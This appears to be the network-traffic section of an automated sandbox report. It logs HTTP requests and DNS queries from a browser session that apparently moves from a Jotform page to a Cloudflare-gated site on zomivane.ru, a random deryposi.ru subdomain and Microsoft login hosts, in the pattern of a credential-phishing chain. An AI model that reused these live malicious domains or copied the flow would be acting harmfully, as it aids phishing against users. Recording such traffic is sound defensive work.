Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/qvn8h/0x4AAAAAAA3bQQTeiQr3m2wy/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://dm9h.zomivane.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8ffcb6abdab37d06&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/qvn8h/0x4AAAAAAA3bQQTeiQr3m2wy/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/qvn8h/0x4AAAAAAA3bQQTeiQr3m2wy/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: dm9h.zomivane.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://dm9h.zomivane.ru/oIZnEw3n/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Im1WWU12dVloRkxqWGUwaTVoa3VCV1E9PSIsInZhbHVlIjoiTUdCL0xRTXprK0F6K202cHA4enZLR3lkT1lkUEdlRmExL0RiZWtsTkp5Z1FLazVVVSthMUZKSDRyeUNKU3k3Y0p2N2ZpRFlsVEI0TFlNOUxHS1NveXpER3RaaTdoblUvRkdDQzdUamsxWkxhN00yVWFnVC9CU1M0bG9pQUpHWmoiLCJtYWMiOiIzYjg3YjE0MmZiZjYwOTk1ZjFlNjk4ZWU3ODMyOTJmYTQyYzBkMGFhODdjNDc5MzAzY2ZhNjYyNDIzYmNjNDNjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkpNMFRaclpZNGhwT1RyeHkvT3Y2b1E9PSIsInZhbHVlIjoiNndBQXQzby9ESXZHTjFReHdla1dkdWovbmFUWGY0NlJJTGF3L0gybzVxZ3dOZ3lJR3dwcGZpNk5HTEF6bXNmOXlDQ1JHYnlhcVVwZkpJRVVRYlBra3JFSUFkMUViN21DVmFYeUY2YndLQURicUFCbmw0OEZHUjd4bmF2aGpUVjEiLCJtYWMiOiI1OTYzNTU3OTZkNjUyNzIxZGMxODcwNGU4NTY3NjE0NjYzNjA2MWU3MzcwYTZlNTE4ZDNmYzdhZDViOTZhNmY2IiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8ffcb6abdab37d06&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/688879100:1736511142:tGsU17yq18PkVnI4wKa3Ww51WTbxFUU1SF8xW7QVDR4/8ffcb6abdab37d06/ZizkGAal8K5b0bq9fQsWLsrFRcrAiFKh.Y5WJ48rebc-1736512595-1.1.1.1-7REzBxzifHwqMMjHAfCLgybYIs4UYWCpBrJIy.X6bN2QQ58Y4moZJeHrjd0eNxGu HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8ffcb6abdab37d06/1736512597511/3H40ckXZIbhbHk8 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/qvn8h/0x4AAAAAAA3bQQTeiQr3m2wy/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8ffcb6abdab37d06/1736512597511/3H40ckXZIbhbHk8 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8ffcb6abdab37d06/1736512597512/e71fcf0a2aec43d09442824780b7a9a9b76de46f1d3348e7711b63e3423fc2c8/w1ALpqNxOxzXP9c HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/qvn8h/0x4AAAAAAA3bQQTeiQr3m2wy/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/688879100:1736511142:tGsU17yq18PkVnI4wKa3Ww51WTbxFUU1SF8xW7QVDR4/8ffcb6abdab37d06/ZizkGAal8K5b0bq9fQsWLsrFRcrAiFKh.Y5WJ48rebc-1736512595-1.1.1.1-7REzBxzifHwqMMjHAfCLgybYIs4UYWCpBrJIy.X6bN2QQ58Y4moZJeHrjd0eNxGu HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/688879100:1736511142:tGsU17yq18PkVnI4wKa3Ww51WTbxFUU1SF8xW7QVDR4/8ffcb6abdab37d06/ZizkGAal8K5b0bq9fQsWLsrFRcrAiFKh.Y5WJ48rebc-1736512595-1.1.1.1-7REzBxzifHwqMMjHAfCLgybYIs4UYWCpBrJIy.X6bN2QQ58Y4moZJeHrjd0eNxGu HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bXsQrxXYFsYVrgqTWHzsoezSpBZQNYHYTYFXZUAAVELNZAUTFWC HTTP/1.1Host: sh81xdbszq0gozj9jyxyzajxmxsyl2omho07oxsdwphufgugjbwcyyem.deryposi.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://dm9h.zomivane.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://dm9h.zomivane.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bXsQrxXYFsYVrgqTWHzsoezSpBZQNYHYTYFXZUAAVELNZAUTFWC HTTP/1.1Host: sh81xdbszq0gozj9jyxyzajxmxsyl2omho07oxsdwphufgugjbwcyyem.deryposi.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /oIZnEw3n/ HTTP/1.1Host: dm9h.zomivane.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Im1WWU12dVloRkxqWGUwaTVoa3VCV1E9PSIsInZhbHVlIjoiTUdCL0xRTXprK0F6K202cHA4enZLR3lkT1lkUEdlRmExL0RiZWtsTkp5Z1FLazVVVSthMUZKSDRyeUNKU3k3Y0p2N2ZpRFlsVEI0TFlNOUxHS1NveXpER3RaaTdoblUvRkdDQzdUamsxWkxhN00yVWFnVC9CU1M0bG9pQUpHWmoiLCJtYWMiOiIzYjg3YjE0MmZiZjYwOTk1ZjFlNjk4ZWU3ODMyOTJmYTQyYzBkMGFhODdjNDc5MzAzY2ZhNjYyNDIzYmNjNDNjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkpNMFRaclpZNGhwT1RyeHkvT3Y2b1E9PSIsInZhbHVlIjoiNndBQXQzby9ESXZHTjFReHdla1dkdWovbmFUWGY0NlJJTGF3L0gybzVxZ3dOZ3lJR3dwcGZpNk5HTEF6bXNmOXlDQ1JHYnlhcVVwZkpJRVVRYlBra3JFSUFkMUViN21DVmFYeUY2YndLQURicUFCbmw0OEZHUjd4bmF2aGpUVjEiLCJtYWMiOiI1OTYzNTU3OTZkNjUyNzIxZGMxODcwNGU4NTY3NjE0NjYzNjA2MWU3MzcwYTZlNTE4ZDNmYzdhZDViOTZhNmY2IiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/6ghio/0x4AAAAAAA3bQQTeiQr3m2wy/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://dm9h.zomivane.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8ffcb89d1f3defa1&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/6ghio/0x4AAAAAAA3bQQTeiQr3m2wy/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8ffcb89d1f3defa1&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1345087052:1736511132:9pUcYqZrWbbHpnfn5qQ_UbKx0b4hCOzXHinJW-FbhBw/8ffcb89d1f3defa1/qdboioj1nzs.qKQ2IGA2i7DiVRCgVnxvzNdYE4uMfkM-1736512675-1.1.1.1-w8jZba1V.DYVKzlxhgfgquKi9isi8IRagts8fZYqLVNPs8x4jdIPsX2NIiP90oRo HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8ffcb89d1f3defa1/1736512677070/VO297syEMFordm7 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/6ghio/0x4AAAAAAA3bQQTeiQr3m2wy/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8ffcb89d1f3defa1/1736512677070/VO297syEMFordm7 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8ffcb89d1f3defa1/1736512677071/7977c391453e8cc5dc41842a441afeb8af031a56098e1995b3d4de3c39a237ab/Yl3kcMMdozhDgWJ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/6ghio/0x4AAAAAAA3bQQTeiQr3m2wy/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: eu.jotform.com
Source: global trafficDNS traffic detected: DNS query: cdn.jotfor.ms
Source: global trafficDNS traffic detected: DNS query: cdn02.jotfor.ms
Source: global trafficDNS traffic detected: DNS query: cdn03.jotfor.ms
Source: global trafficDNS traffic detected: DNS query: cdn01.jotfor.ms
Source: global trafficDNS traffic detected: DNS query: js.jotform.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: o61806.ingest.sentry.io
Source: global trafficDNS traffic detected: DNS query: eu-files.jotform.com
Source: global trafficDNS traffic detected: DNS query: events.jotform.com
Source: global trafficDNS traffic detected: DNS query: www.jotform.com
Source: global trafficDNS traffic detected: DNS query: dm9h.zomivane.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: sh81xdbszq0gozj9jyxyzajxmxsyl2omho07oxsdwphufgugjbwcyyem.deryposi.ru
Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: www.office.com
Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global trafficDNS traffic detected: DNS query: fpt.live.com
Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
Source: unknownHTTP traffic detected: POST /api/5223511/envelope/?sentry_key=36d29a013f8a4bd7adfe310f5fe4d75a&sentry_version=7&sentry_client=sentry.javascript.react%2F8.34.0 HTTP/1.1Host: o61806.ingest.sentry.ioConnection: keep-aliveContent-Length: 468sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://eu.jotform.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://eu.jotform.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Jan 2025 12:36:00 GMTContent-Type: text/htmlContent-Length: 548Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadVia: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Jan 2025 12:36:14 GMTContent-Type: text/htmlContent-Length: 548Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadVia: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Jan 2025 12:36:15 GMTContent-Type: text/htmlContent-Length: 548Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadVia: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 12:36:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingp3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"last-modified: Fri, 10 Jan 2025 12:36:15 GMTjf-trace-id: 6302998b4c813504strict-transport-security: max-age=31536000;content-security-policy-report-only: default-src https: data: blob: wss: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' *.jotfor.ms https://js.jotform.com/actions.js https://www.googletagmanager.com https://consent.cookiebot.com https://consentcdn.cookiebot.com https://static.olark.com https://knrpc.olark.com/nrpc/ https://js-agent.newrelic.com https://browser.sentry-cdn.com https://js.sentry-cdn.com https://edge.fullstory.com https://rs.fullstory.com; report-uri /opt/csp-violation-report.phpexpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatepragma: no-cacheSet-Cookie: guest=guest_5a3c5173c0bb4f63; expires=Mon, 10 Feb 2025 12:36:15 GMT; Max-Age=2678400; path=/; domain=.jotform.com; secure; HttpOnly; SameSite=NoneSet-Cookie: guest=guest_5a3c5173c0bb4f63; expires=Mon, 10 Feb 2025 12:36:15 GMT; Max-Age=2678400; path=/; domain=.jotform.com; secure; HttpOnly; SameSite=Nonex-frame-options: SAMEORIGINvia: 1.1 google
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Jan 2025 12:36:17 GMTContent-Type: text/htmlContent-Length: 548Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadVia: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Jan 2025 12:36:17 GMTContent-Type: text/htmlContent-Length: 548Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadVia: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Jan 2025 12:36:18 GMTContent-Type: text/htmlContent-Length: 548Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadVia: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 12:36:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingp3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"last-modified: Fri, 10 Jan 2025 12:36:19 GMTjf-trace-id: 6145b19d75ecc39fstrict-transport-security: max-age=31536000;content-security-policy-report-only: default-src https: data: blob: wss: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' *.jotfor.ms https://js.jotform.com/actions.js https://www.googletagmanager.com https://consent.cookiebot.com https://consentcdn.cookiebot.com https://static.olark.com https://knrpc.olark.com/nrpc/ https://js-agent.newrelic.com https://browser.sentry-cdn.com https://js.sentry-cdn.com https://edge.fullstory.com https://rs.fullstory.com; report-uri /opt/csp-violation-report.phpexpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatepragma: no-cacheSet-Cookie: guest=guest_5a3c5173c0bb4f63; expires=Mon, 10 Feb 2025 12:36:19 GMT; Max-Age=2678400; path=/; domain=.jotform.com; secure; HttpOnly; SameSite=NoneSet-Cookie: guest=guest_5a3c5173c0bb4f63; expires=Mon, 10 Feb 2025 12:36:19 GMT; Max-Age=2678400; path=/; domain=.jotform.com; secure; HttpOnly; SameSite=Nonex-frame-options: SAMEORIGINvia: 1.1 google
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Jan 2025 12:36:29 GMTContent-Type: text/htmlContent-Length: 548Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadVia: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
